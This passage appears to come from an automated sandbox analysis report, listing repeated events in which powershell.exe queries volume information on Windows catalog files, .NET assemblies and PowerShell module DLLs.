                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
